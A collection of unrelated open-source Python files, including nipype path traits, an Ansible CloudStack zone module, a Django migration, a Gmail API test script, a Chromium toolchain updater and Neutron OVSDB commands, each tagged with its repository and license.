        # Normalize: unset values and empty lists become Undefined.
        if not isdefined(value) or \
            (isinstance(value, list) and len(value) == 0):
            return Undefined
        newvalue = value
        # Wrap the value into a one-element list when either (a) it is not a
        # list at all, or (b) the inner trait is itself a List (but not an
        # InputMultiPath) and we were handed a flat, non-nested list -- so
        # the List validator below sees the expected list-of-X shape.
        if not isinstance(value, list) \
            or (self.inner_traits()
                and isinstance(self.inner_traits()[0].trait_type, traits.List)
                and not isinstance(self.inner_traits()[0].trait_type,
                                   InputMultiPath)
                and isinstance(value, list)
                and value
                and not isinstance(value[0], list)):
            newvalue = [value]
        value = super(MultiPath, self).validate(object, name, newvalue)
        # Only a non-empty validated list is acceptable; everything else is
        # a trait error.
        if len(value) > 0:
            return value
        self.error(object, name, value)
class OutputMultiPath(MultiPath):
    """ Implements a user friendly traits that accepts one or more
    paths to files or directories. This is the output version which
    return a single string whenever possible (when it was set to a
    single value or a list of length 1). Default value of this trait
    is _Undefined. It does not accept empty lists.
    XXX This should only be used as a final resort. We should stick to
    established Traits to the extent possible.
    XXX This needs to be vetted by somebody who understands traits
    >>> from nipype.interfaces.base import OutputMultiPath
    >>> class A(TraitedSpec):
    ...     foo = OutputMultiPath(File(exists=False))
    >>> a = A()
    >>> a.foo
    <undefined>
    >>> a.foo = '/software/temp/foo.txt'
    >>> a.foo
    '/software/temp/foo.txt'
    >>> a.foo = ['/software/temp/foo.txt']
    >>> a.foo
    '/software/temp/foo.txt'
    >>> a.foo = ['/software/temp/foo.txt', '/software/temp/goo.txt']
    >>> a.foo
    ['/software/temp/foo.txt', '/software/temp/goo.txt']
    """
    def get(self, object, name):
        # Unwrap: empty -> Undefined, singleton -> bare element, else list.
        value = self.get_value(object, name)
        if len(value) == 0:
            return Undefined
        if len(value) == 1:
            return value[0]
        return value
    def set(self, object, name, value):
        self.set_value(object, name, value)
class InputMultiPath(MultiPath):
    """ Implements a user friendly traits that accepts one or more
    paths to files or directories. This is the input version which
    always returns a list (unlike OutputMultiPath). Default value of this
    trait is _Undefined. It does not accept empty lists.
    XXX This should only be used as a final resort. We should stick to
    established Traits to the extent possible.
    XXX This needs to be vetted by somebody who understands traits
    >>> from nipype.interfaces.base import InputMultiPath
    >>> class A(TraitedSpec):
    ...     foo = InputMultiPath(File(exists=False))
    >>> a = A()
    >>> a.foo
    <undefined>
    >>> a.foo = '/software/temp/foo.txt'
    >>> a.foo
    ['/software/temp/foo.txt']
    >>> a.foo = ['/software/temp/foo.txt']
    >>> a.foo
    ['/software/temp/foo.txt']
    >>> a.foo = ['/software/temp/foo.txt', '/software/temp/goo.txt']
    >>> a.foo
    ['/software/temp/foo.txt', '/software/temp/goo.txt']
    """
    # All behavior lives in MultiPath.validate; this subclass only marks the
    # input variant (MultiPath.validate special-cases InputMultiPath).
    pass
| FredLoney/nipype | nipype/interfaces/base.py | Python | bsd-3-clause | 71,243 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2016, René Moser <mail@renemoser.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Module metadata: stable public interface, maintained by the community.
ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['stableinterface'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_zone
short_description: Manages zones on Apache CloudStack based clouds.
description:
- Create, update and remove zones.
version_added: "2.1"
author: "René Moser (@resmo)"
options:
name:
description:
- Name of the zone.
required: true
id:
description:
- uuid of the existing zone.
default: null
required: false
state:
description:
- State of the zone.
required: false
default: 'present'
choices: [ 'present', 'enabled', 'disabled', 'absent' ]
domain:
description:
- Domain the zone is related to.
- Zone is a public zone if not set.
required: false
default: null
network_domain:
description:
- Network domain for the zone.
required: false
default: null
network_type:
description:
- Network type of the zone.
required: false
default: basic
choices: [ 'basic', 'advanced' ]
dns1:
description:
- First DNS for the zone.
- Required if C(state=present)
required: false
default: null
dns2:
description:
- Second DNS for the zone.
required: false
default: null
internal_dns1:
description:
- First internal DNS for the zone.
- If not set C(dns1) will be used on C(state=present).
required: false
default: null
internal_dns2:
description:
- Second internal DNS for the zone.
required: false
default: null
dns1_ipv6:
description:
- First DNS for IPv6 for the zone.
required: false
default: null
dns2_ipv6:
description:
- Second DNS for IPv6 for the zone.
required: false
default: null
guest_cidr_address:
description:
- Guest CIDR address for the zone.
required: false
default: null
dhcp_provider:
description:
- DHCP provider for the Zone.
required: false
default: null
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
# Ensure a zone is present
- local_action:
module: cs_zone
name: ch-zrh-ix-01
dns1: 8.8.8.8
dns2: 8.8.4.4
network_type: basic
# Ensure a zone is disabled
- local_action:
module: cs_zone
name: ch-zrh-ix-01
state: disabled
# Ensure a zone is enabled
- local_action:
module: cs_zone
name: ch-zrh-ix-01
state: enabled
# Ensure a zone is absent
- local_action:
module: cs_zone
name: ch-zrh-ix-01
state: absent
'''
RETURN = '''
---
id:
description: UUID of the zone.
returned: success
type: string
sample: 04589590-ac63-4ffc-93f5-b698b8ac38b6
name:
description: Name of the zone.
returned: success
type: string
sample: zone01
dns1:
description: First DNS for the zone.
returned: success
type: string
sample: 8.8.8.8
dns2:
description: Second DNS for the zone.
returned: success
type: string
sample: 8.8.4.4
internal_dns1:
description: First internal DNS for the zone.
returned: success
type: string
sample: 8.8.8.8
internal_dns2:
description: Second internal DNS for the zone.
returned: success
type: string
sample: 8.8.4.4
dns1_ipv6:
description: First IPv6 DNS for the zone.
returned: success
type: string
sample: "2001:4860:4860::8888"
dns2_ipv6:
description: Second IPv6 DNS for the zone.
returned: success
type: string
sample: "2001:4860:4860::8844"
allocation_state:
description: State of the zone.
returned: success
type: string
sample: Enabled
domain:
description: Domain the zone is related to.
returned: success
type: string
sample: ROOT
network_domain:
description: Network domain for the zone.
returned: success
type: string
sample: example.com
network_type:
description: Network type for the zone.
returned: success
type: string
sample: basic
local_storage_enabled:
description: Local storage offering enabled.
returned: success
type: bool
sample: false
securitygroups_enabled:
description: Security groups support is enabled.
returned: success
type: bool
sample: false
guest_cidr_address:
description: Guest CIDR address for the zone
returned: success
type: string
sample: 10.1.1.0/24
dhcp_provider:
description: DHCP provider for the zone
returned: success
type: string
sample: VirtualRouter
zone_token:
description: Zone token
returned: success
type: string
sample: ccb0a60c-79c8-3230-ab8b-8bdbe8c45bb7
tags:
description: List of resource tags associated with the zone.
returned: success
type: dict
sample: [ { "key": "foo", "value": "bar" } ]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
CloudStackException,
cs_argument_spec,
cs_required_together,
)
class AnsibleCloudStackZone(AnsibleCloudStack):
    """Manage CloudStack zones: lookup, create, update and remove."""

    def __init__(self, module):
        super(AnsibleCloudStackZone, self).__init__(module)
        # Maps CloudStack API result keys to this module's return-value keys.
        self.returns = {
            'dns1': 'dns1',
            'dns2': 'dns2',
            'internaldns1': 'internal_dns1',
            'internaldns2': 'internal_dns2',
            'ipv6dns1': 'dns1_ipv6',
            'ipv6dns2': 'dns2_ipv6',
            'domain': 'network_domain',
            'networktype': 'network_type',
            'securitygroupsenabled': 'securitygroups_enabled',
            'localstorageenabled': 'local_storage_enabled',
            'guestcidraddress': 'guest_cidr_address',
            'dhcpprovider': 'dhcp_provider',
            'allocationstate': 'allocation_state',
            'zonetoken': 'zone_token',
        }
        # Cache for get_zone() so the API is queried at most once per run.
        self.zone = None

    def _get_common_zone_args(self):
        """Build the argument dict shared by createZone and updateZone."""
        args = {
            'name': self.module.params.get('name'),
            'dns1': self.module.params.get('dns1'),
            'dns2': self.module.params.get('dns2'),
            'internaldns1': self.get_or_fallback('internal_dns1', 'dns1'),
            'internaldns2': self.get_or_fallback('internal_dns2', 'dns2'),
            'ipv6dns1': self.module.params.get('dns1_ipv6'),
            'ipv6dns2': self.module.params.get('dns2_ipv6'),
            'networktype': self.module.params.get('network_type'),
            'domain': self.module.params.get('network_domain'),
            'localstorageenabled': self.module.params.get('local_storage_enabled'),
            'guestcidraddress': self.module.params.get('guest_cidr_address'),
            'dhcpprovider': self.module.params.get('dhcp_provider'),
        }
        state = self.module.params.get('state')
        if state in ['enabled', 'disabled']:
            # The API expects 'Enabled' / 'Disabled'.
            args['allocationstate'] = state.capitalize()
        return args

    def get_zone(self):
        """Return the existing zone (by id, falling back to name) or None.

        Fix: previously the first listZones call ran even when no id was
        given (an unfiltered listZones returns every zone, so the first
        arbitrary zone was matched), and the stale 'id' filter was left in
        the args for the name fallback so it could never match anything.
        The lookups are now performed with exactly one filter each.
        """
        if not self.zone:
            uuid = self.module.params.get('id')
            if uuid:
                zones = self.cs.listZones(id=uuid)
                if zones:
                    self.zone = zones['zone'][0]
                    return self.zone
            zones = self.cs.listZones(name=self.module.params.get('name'))
            if zones:
                self.zone = zones['zone'][0]
        return self.zone

    def present_zone(self):
        """Ensure the zone exists, creating or updating it as needed."""
        zone = self.get_zone()
        if zone:
            zone = self._update_zone()
        else:
            zone = self._create_zone()
        return zone

    def _create_zone(self):
        """Create a new zone; 'dns1' is required by the API."""
        required_params = [
            'dns1',
        ]
        self.module.fail_on_missing_params(required_params=required_params)
        self.result['changed'] = True
        args = self._get_common_zone_args()
        args['domainid'] = self.get_domain(key='id')
        args['securitygroupenabled'] = self.module.params.get('securitygroups_enabled')
        zone = None
        # In check mode report the change without touching the cloud.
        if not self.module.check_mode:
            res = self.cs.createZone(**args)
            if 'errortext' in res:
                self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
            zone = res['zone']
        return zone

    def _update_zone(self):
        """Update an existing zone when any common argument differs."""
        zone = self.get_zone()
        args = self._get_common_zone_args()
        args['id'] = zone['id']
        if self.has_changed(args, zone):
            self.result['changed'] = True
            if not self.module.check_mode:
                res = self.cs.updateZone(**args)
                if 'errortext' in res:
                    self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
                zone = res['zone']
        return zone

    def absent_zone(self):
        """Delete the zone if present; returns the (pre-delete) zone dict."""
        zone = self.get_zone()
        if zone:
            self.result['changed'] = True
            if not self.module.check_mode:
                res = self.cs.deleteZone(id=zone['id'])
                if 'errortext' in res:
                    self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
        return zone
def main():
    """Module entry point: build the argument spec and dispatch on 'state'."""
    argument_spec = cs_argument_spec()
    argument_spec.update(dict(
        id=dict(),
        name=dict(required=True),
        dns1=dict(),
        dns2=dict(),
        internal_dns1=dict(),
        internal_dns2=dict(),
        dns1_ipv6=dict(),
        dns2_ipv6=dict(),
        network_type=dict(default='basic', choices=['Basic', 'basic', 'Advanced', 'advanced']),
        network_domain=dict(),
        guest_cidr_address=dict(),
        dhcp_provider=dict(),
        local_storage_enabled=dict(type='bool'),
        securitygroups_enabled=dict(type='bool'),
        state=dict(choices=['present', 'enabled', 'disabled', 'absent'], default='present'),
        domain=dict(),
    ))
    module = AnsibleModule(
        argument_spec=argument_spec,
        required_together=cs_required_together(),
        supports_check_mode=True
    )
    try:
        acs_zone = AnsibleCloudStackZone(module)
        # 'present', 'enabled' and 'disabled' all converge on present_zone();
        # only 'absent' removes the zone.
        if module.params.get('state') == 'absent':
            zone = acs_zone.absent_zone()
        else:
            zone = acs_zone.present_zone()
        result = acs_zone.get_result(zone)
    except CloudStackException as e:
        module.fail_json(msg='CloudStackException: %s' % str(e))
    module.exit_json(**result)


if __name__ == '__main__':
    main()
| DepthDeluxe/ansible | lib/ansible/modules/cloud/cloudstack/cs_zone.py | Python | gpl-3.0 | 11,062 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-18 23:03
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds the optional 'postal_code' field
    # (blank-able CharField, max 255 chars) to the PoliticalPlace model.
    dependencies = [
        ('politicalplaces', '0008_auto_20170317_1636'),
    ]
    operations = [
        migrations.AddField(
            model_name='politicalplace',
            name='postal_code',
            field=models.CharField(blank=True, max_length=255),
        ),
    ]
| 20tab/django-political-map | politicalplaces/migrations/0009_politicalplace_postal_code.py | Python | mit | 483 |
import random
from . import base
import alvi.client.containers
class BinarySearch(base.Scene):
    """Visualization scene: fill an array, sort it, then binary-search it.

    Each array.sync() pushes the current container state to the client so
    every mutation is rendered as an animation step.
    """
    def init(self, array, n):
        # Allocate the container and publish the initial (empty) state.
        array.init(n)
        array.sync()
    def generate_points(self, array, data_generator):
        # Copy generated values into the array, syncing after each write so
        # the fill is animated element by element.
        for i, value in enumerate(data_generator.values):
            array[i] = value
            array.sync()
    def search(self, array, value):
        # Iterative binary search over array[left..right], with markers
        # visualizing the shrinking search interval.
        left = 0
        right = array.size()-1
        left_marker = array.create_marker("left", left)
        right_marker = array.create_marker("right", right)
        array.sync()
        while left <= right:
            mid = (right + left) // 2
            if array[mid] > value:
                right = mid - 1
                # Only move the marker while it stays inside the array.
                if right >= 0:
                    right_marker.move(right)
            elif array[mid] < value:
                left = mid + 1
                if left < array.size():
                    left_marker.move(left)
            else:
                # Found: record the index, mark it, and drop the interval
                # markers before returning.
                array.stats.found_id = mid
                array.create_marker("found", mid)
                array.sync()
                left_marker.remove()
                right_marker.remove()
                return
            array.sync()
        # NOTE(review): on the not-found path the left/right markers are left
        # in place -- presumably intentional for the final visualization.
        array.stats.not_found = ""
    def run(self, **kwargs):
        # Scene entry point: pick a random target, fill, sort, then search.
        array = kwargs['container']
        data_generator = kwargs['data_generator']
        wanted_value = random.randint(1, data_generator.quantity())
        array.stats.wanted_value = wanted_value
        self.init(array, data_generator.quantity())
        self.generate_points(array, data_generator)
        # Sort in place (element by element, animated) before searching.
        for i, value in enumerate(sorted(array)):
            array[i] = value
            array.sync()
        self.search(array, wanted_value)
        array.sync()
    @staticmethod
    def container_class():
        # The container type this scene visualizes.
        return alvi.client.containers.Array
if __name__ == "__main__":
    BinarySearch.start()
#!/usr/bin/python
# Sanity-check script for the Gmail API: performs the OAuth2 flow, caches the
# credentials on disk, and lists the IDs of the user's mail threads.
# NOTE(review): Python 2 only (print statement) and uses the legacy
# oauth2client/apiclient libraries.
import argparse
import httplib2
from apiclient.discovery import build
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import run_flow, argparser
# Parse the command-line arguments (e.g. --noauth_local_webserver)
parser = argparse.ArgumentParser(parents=[argparser])
flags = parser.parse_args()
# Path to the client_secret.json file downloaded from the Developer Console
# NOTE(review): hard-coded per-machine path; make this configurable.
#CLIENT_SECRET_FILE = 'h:/.client_secret.json'
CLIENT_SECRET_FILE = '/home/gmv/.client_secret.json'
# Check https://developers.google.com/gmail/api/auth/scopes
# for all available scopes
OAUTH_SCOPE = 'https://www.googleapis.com/auth/gmail.readonly'
# Location of the credentials storage file
STORAGE = Storage('gmail.storage')
# Start the OAuth flow to retrieve credentials
flow = flow_from_clientsecrets(CLIENT_SECRET_FILE, scope=OAUTH_SCOPE)
http = httplib2.Http()
# Try to retrieve credentials from storage or run the flow to generate them
credentials = STORAGE.get()
if credentials is None or credentials.invalid:
    credentials = run_flow(flow, STORAGE, flags, http=http)
# Authorize the httplib2.Http object with our credentials
http = credentials.authorize(http)
# Build the Gmail service from discovery
gmail_service = build('gmail', 'v1', http=http)
# Retrieve a page of threads
threads = gmail_service.users().threads().list(userId='me').execute()
# Print ID for each thread
# NOTE(review): the API omits the 'threads' key when the mailbox is empty, so
# this raises KeyError in that case; threads.get('threads') would be safer.
if threads['threads']:
    for thread in threads['threads']:
        print 'Thread ID: %s' % (thread['id'])
| erdincay/gmvault | src/sandbox/python_api_tests.py | Python | agpl-3.0 | 1,557 |
__all__ = ["config", "pageserver", "restful", "worker"]
import config
import pageserver
import restful
import worker
def run(host, port):
    """
    Runs the Flask development server.
    @param host The host/interface for the server to bind to
    @param port The port for the server (string or int; coerced to int)
    """
    # debug=True enables the debugger; the reloader is disabled explicitly so
    # the process is not forked/restarted on code changes.
    config.app.run(host=host, port=int(port), debug=True, use_reloader=False)
| wallarelvo/SmallCartography | carto/master/__init__.py | Python | apache-2.0 | 341 |
import fechbase
class Records(fechbase.RecordsBase):
    """Field layout for the FEC Form F3Z record (format version v1)."""
    def __init__(self):
        fechbase.RecordsBase.__init__(self)
        # Ordered field descriptors: 'name' is the field label, 'number' is
        # the column / form-line reference from the FEC documentation.
        self.fields = [
            {'name': 'FORM TYPE', 'number': '1'},
            {'name': 'FEC COMMITTEE ID NUMBER (PCC)', 'number': '2'},
            {'name': 'COMMITTEE NAME (PCC)', 'number': '3'},
            {'name': 'COVERAGE FROM', 'number': '4-'},
            {'name': 'COVERAGE TO', 'number': '5-'},
            {'name': 'FEC COMMITTEE ID NUMBER (AUTH) (blank for totals record)', 'number': '6'},
            {'name': 'COMMITTEE NAME (AUTH)', 'number': '7'},
            {'name': 'individuals total', 'number': '8-(a) 11(a)iii'},
            {'name': 'Political party committees', 'number': '9-(b) 11(b)'},
            {'name': 'other pol committees (PACs)', 'number': '10-(c) 11(c)'},
            {'name': 'the candidate', 'number': '11-(d) 11(d)'},
            {'name': 'total contributions', 'number': '12-(e) 11(e)'},
            {'name': 'Transfers from other auth Committees', 'number': '13-(f) 12'},
            {'name': 'made or guarn by candidate', 'number': '14-(g) 13(a)'},
            {'name': 'all other loans', 'number': '15-(h) 13(b)'},
            {'name': 'total loans', 'number': '16-(i) 13(c)'},
            {'name': 'offsets to operating expend', 'number': '17-(j) 14'},
            {'name': 'Other receipts', 'number': '18-(k) 15'},
            {'name': 'total receipts', 'number': '19-(l) 16'},
            {'name': 'Operating Expenditures', 'number': '20-(m) 17'},
            {'name': 'Transfers to other auth Committees', 'number': '21-(n) 18'},
            {'name': 'made or guaranteed by cand', 'number': '22-(o) 19(a)'},
            {'name': 'all other loans', 'number': '23-(p) 19(b)'},
            {'name': 'total loan repayments', 'number': '24-(q) 19(c)'},
            {'name': 'total refunds individuals', 'number': '25-(r) 20(a)'},
            {'name': 'Refunds Political Party Committees', 'number': '26-(s) 20(b)'},
            {'name': 'Refunds other Political Committees', 'number': '27-(t) 20(c)'},
            {'name': 'total contribution refunds', 'number': '28-(u) 20(d)'},
            {'name': 'Other disbursements', 'number': '29-(v) 21'},
            {'name': 'Total disbursements', 'number': '30-(w) 22'},
            {'name': 'COH BEGINNING REPORTING period', 'number': '31-(x) 23'},
            {'name': 'cash on hand at close period', 'number': '32-(y) 27'},
            {'name': 'Debts to', 'number': '33-(z) 9'},
            {'name': 'Debts by', 'number': '34-(aa) 12'},
            {'name': 'net contributions', 'number': '35-(bb) 6(c)'},
            {'name': 'net operating expenditures', 'number': '36-(cc) 7(c)'},
        ]
        # Lookup table built by the base class from the descriptors above.
        self.fields_names = self.hash_names(self.fields)
| h4ck3rm1k3/FEC-Field-Documentation | fec/version/v1/F3Z.py | Python | unlicense | 2,766 |
#! /usr/bin/env python
# coding=utf-8
#############################################################################
# #
# File: setup.py #
# #
# Copyright (C) 2008-2010 Du XiaoGang <dugang.2008@gmail.com> #
# #
# Home: http://gappproxy.googlecode.com #
# #
# This file is part of GAppProxy. #
# #
# GAppProxy is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as #
# published by the Free Software Foundation, either version 3 of the #
# License, or (at your option) any later version. #
# #
# GAppProxy is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with GAppProxy. If not, see <http://www.gnu.org/licenses/>. #
# #
#############################################################################
from distutils.core import setup
import py2exe
# py2exe build options: bytecode-optimize (-OO), compress the library
# archive, and bundle everything into a single file.
PY2EXE_OPTIONS = {
    "optimize": 2,
    "compressed": 1,
    "bundle_files": 1,
}
setup(
    name="GAppProxy Uploader",
    options={"py2exe": PY2EXE_OPTIONS},
    zipfile=None,
    console=["uploader.py"],
)
| gauravssnl/gappproxy | uploader/setup.py | Python | gpl-3.0 | 2,173 |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import ctypes.wintypes
import hashlib
import json
import os
import subprocess
import sys
BASEDIR = os.path.dirname(os.path.abspath(__file__))
GetFileAttributes = ctypes.windll.kernel32.GetFileAttributesW
GetFileAttributes.argtypes = (ctypes.wintypes.LPWSTR,)
GetFileAttributes.restype = ctypes.wintypes.DWORD
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
def IsHidden(file_path):
  """Returns whether the given |file_path| has the 'system' or 'hidden'
  attribute set."""
  attrs = GetFileAttributes(file_path)
  # 0xffffffff is INVALID_FILE_ATTRIBUTES, i.e. the call failed.
  assert attrs != 0xffffffff
  return (attrs & (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM)) != 0
def GetFileList(root):
  """Gets a sorted, lower-cased list of non-hidden files under |root|.

  |root| must be a normalized relative path.
  """
  assert not os.path.isabs(root)
  assert os.path.normpath(root) == root
  result = []
  for base, _, files in os.walk(root):
    for name in files:
      path = os.path.join(base, name)
      if not IsHidden(path):
        result.append(path.lower())
  return sorted(result)
def MakeTimestampsFileName(root):
  """Path of the .timestamps cache file stored next to (one level above)
  |root|."""
  return os.path.join(root, os.pardir, '.timestamps')
def CalculateHash(root):
  """Calculates the sha1 of the paths to all files in the given |root| and the
  contents of those files, and returns as a hex string."""
  file_list = GetFileList(root)
  # Check whether we previously saved timestamps in $root/../.timestamps. If
  # we didn't, or they don't match, then do the full calculation, otherwise
  # return the saved value.
  timestamps_file = MakeTimestampsFileName(root)
  timestamps_data = {'files': [], 'sha1': ''}
  if os.path.exists(timestamps_file):
    with open(timestamps_file, 'rb') as f:
      try:
        timestamps_data = json.load(f)
      except ValueError:
        # json couldn't be loaded, empty data will force a re-hash.
        pass
  # The cache is valid only if every path and mtime matches exactly.
  matches = len(file_list) == len(timestamps_data['files'])
  if matches:
    for disk, cached in zip(file_list, timestamps_data['files']):
      if disk != cached[0] or os.stat(disk).st_mtime != cached[1]:
        matches = False
        break
  if matches:
    return timestamps_data['sha1']
  # Full hash: fold each path and the file's raw bytes into one digest.
  digest = hashlib.sha1()
  for path in file_list:
    # NOTE(review): hashes the str path directly -- Python 2 semantics.
    digest.update(path)
    with open(path, 'rb') as f:
      digest.update(f.read())
  return digest.hexdigest()
def SaveTimestampsAndHash(root, sha1):
  """Save timestamps and the final hash to be able to early-out more quickly
  next time."""
  stamps = {
      'sha1': sha1,
      'files': [[path, os.stat(path).st_mtime] for path in GetFileList(root)],
  }
  with open(MakeTimestampsFileName(root), 'wb') as f:
    json.dump(stamps, f)
def main():
  # Entry point: ensure the Windows toolchain under
  # src\third_party\win_toolchain matches the pinned sha1, re-fetching it
  # via toolchain2013.py when it does not.
  if sys.platform not in ('win32', 'cygwin'):
    # No-op on non-Windows hosts.
    return 0
  if len(sys.argv) != 1:
    print >> sys.stderr, 'Unexpected arguments.'
    return 1
  # Move to same location as .gclient. This is a no-op when run via gclient.
  os.chdir(os.path.normpath(os.path.join(BASEDIR, '..\\..\\..\\..')))
  toolchain_dir = 'src\\third_party\\win_toolchain'
  target_dir = os.path.join(toolchain_dir, 'files')
  sha1path = os.path.join(toolchain_dir, 'toolchain.sha1')
  desired_hash = ''
  if os.path.isfile(sha1path):
    with open(sha1path, 'rb') as f:
      desired_hash = f.read().strip()
  # If the current hash doesn't match what we want in the file, nuke and pave.
  # Typically this script is only run when the .sha1 one file is updated, but
  # directly calling "gclient runhooks" will also run it, so we cache
  # based on timestamps to make that case fast.
  current_hash = CalculateHash(target_dir)
  if current_hash != desired_hash:
    print 'Windows toolchain out of date or doesn\'t exist, updating...'
    if os.path.isdir(target_dir):
      subprocess.check_call('rmdir /s/q "%s"' % target_dir, shell=True)
    subprocess.check_call([
        sys.executable,
        'src\\tools\\win\\toolchain\\toolchain2013.py',
        '--targetdir', target_dir])
    current_hash = CalculateHash(target_dir)
    if current_hash != desired_hash:
      # The freshly-fetched toolchain still doesn't match the pin: fail.
      print >> sys.stderr, (
          'Got wrong hash after pulling a new toolchain. '
          'Wanted \'%s\', got \'%s\'.' % (
              desired_hash, current_hash))
      return 1
    # Cache paths/mtimes so the next run can early-out without hashing.
    SaveTimestampsAndHash(target_dir, current_hash)
  return 0


if __name__ == '__main__':
  sys.exit(main())
| androidarmv6/android_external_chromium_org | tools/win/toolchain/get_toolchain_if_necessary.py | Python | bsd-3-clause | 4,403 |
# Copyright (c) 2015 Openstack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from oslo_log import log as logging
from oslo_utils import excutils
from neutron.agent.ovsdb import api
from neutron.agent.ovsdb.native import idlutils
from neutron.i18n import _LE
LOG = logging.getLogger(__name__)
class BaseCommand(api.Command):
    """Common execution plumbing for the native-OVSDB command objects."""
    def __init__(self, api):
        self.api = api
        self.result = None
    def execute(self, check_error=False, log_errors=True):
        """Run this command in its own transaction and return its result."""
        try:
            with self.api.transaction(check_error, log_errors) as txn:
                txn.add(self)
        except Exception:
            with excutils.save_and_reraise_exception() as ctx:
                if log_errors:
                    LOG.exception(_LE("Error executing command"))
                if not check_error:
                    # Best-effort mode: swallow the error after logging.
                    ctx.reraise = False
        else:
            return self.result
    def __str__(self):
        # Render as ClassName(attr=value, ...), hiding internal fields.
        attrs = ", ".join(
            "%s=%s" % (key, value)
            for key, value in self.__dict__.items()
            if key not in ('api', 'result'))
        return "%s(%s)" % (type(self).__name__, attrs)
class AddBridgeCommand(BaseCommand):
    """Create a bridge (plus its same-named internal port/interface)."""
    def __init__(self, api, name, may_exist):
        super(AddBridgeCommand, self).__init__(api)
        self.name = name
        self.may_exist = may_exist
    def run_idl(self, txn):
        # Idempotent mode: silently succeed if the bridge already exists.
        if self.may_exist and idlutils.row_by_value(
                self.api.idl, 'Bridge', 'name', self.name, None):
            return
        bridge = txn.insert(self.api._tables['Bridge'])
        bridge.name = self.name
        self.api._ovs.verify('bridges')
        self.api._ovs.bridges = self.api._ovs.bridges + [bridge]
        # Add the internal bridge port
        AddPortCommand(self.api, self.name, self.name,
                       self.may_exist).run_idl(txn)
        DbSetCommand(self.api, 'Interface', self.name,
                     ('type', 'internal')).run_idl(txn)
class DelBridgeCommand(BaseCommand):
    """Delete a bridge together with all of its ports and interfaces."""
    def __init__(self, api, name, if_exists):
        super(DelBridgeCommand, self).__init__(api)
        self.name = name
        # When True, a missing bridge is treated as success, not an error.
        self.if_exists = if_exists
    def run_idl(self, txn):
        try:
            br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
                                       self.name)
        except idlutils.RowNotFound:
            if self.if_exists:
                return
            else:
                msg = _LE("Bridge %s does not exist") % self.name
                LOG.error(msg)
                raise RuntimeError(msg)
        self.api._ovs.verify('bridges')
        # Remove every port first so no dangling rows are left behind.
        for port in br.ports:
            cmd = DelPortCommand(self.api, port.name, self.name,
                                 if_exists=True)
            cmd.run_idl(txn)
        # Detach the bridge from the root table, then delete its row.
        bridges = self.api._ovs.bridges
        bridges.remove(br)
        self.api._ovs.bridges = bridges
        self.api._tables['Bridge'].rows[br.uuid].delete()
class BridgeExistsCommand(BaseCommand):
    """Set result to True iff a bridge with the given name exists."""
    def __init__(self, api, name):
        super(BridgeExistsCommand, self).__init__(api)
        self.name = name
    def run_idl(self, txn):
        row = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
                                    self.name, None)
        self.result = bool(row)
class ListBridgesCommand(BaseCommand):
    """Set result to the names of all bridges in the database."""
    def __init__(self, api):
        super(ListBridgesCommand, self).__init__(api)
    def run_idl(self, txn):
        # NOTE (twilson) [x.name for x in rows.values()] if no index
        bridge_rows = self.api._tables['Bridge'].rows.values()
        self.result = [bridge.name for bridge in bridge_rows]
class BrGetExternalIdCommand(BaseCommand):
    """Read one external_ids entry from the named bridge."""
    def __init__(self, api, name, field):
        super(BrGetExternalIdCommand, self).__init__(api)
        self.name = name
        self.field = field
    def run_idl(self, txn):
        bridge = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
                                       self.name)
        self.result = bridge.external_ids[self.field]
class BrSetExternalIdCommand(BaseCommand):
    """Write one external_ids entry on the named bridge."""
    def __init__(self, api, name, field, value):
        super(BrSetExternalIdCommand, self).__init__(api)
        self.name = name
        self.field = field
        self.value = value
    def run_idl(self, txn):
        bridge = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
                                       self.name)
        # Re-assign the whole map so the IDL registers the change.
        ids = getattr(bridge, 'external_ids', {})
        ids[self.field] = self.value
        bridge.external_ids = ids
class DbSetCommand(BaseCommand):
    """Set one or more (column, value) pairs on an arbitrary table record."""
    def __init__(self, api, table, record, *col_values):
        super(DbSetCommand, self).__init__(api)
        self.table = table
        self.record = record
        # Sequence of (column, value) pairs to apply.
        self.col_values = col_values
    def run_idl(self, txn):
        record = idlutils.row_by_record(self.api.idl, self.table, self.record)
        for col, val in self.col_values:
            # TODO(twilson) Ugh, the OVS library doesn't like OrderedDict
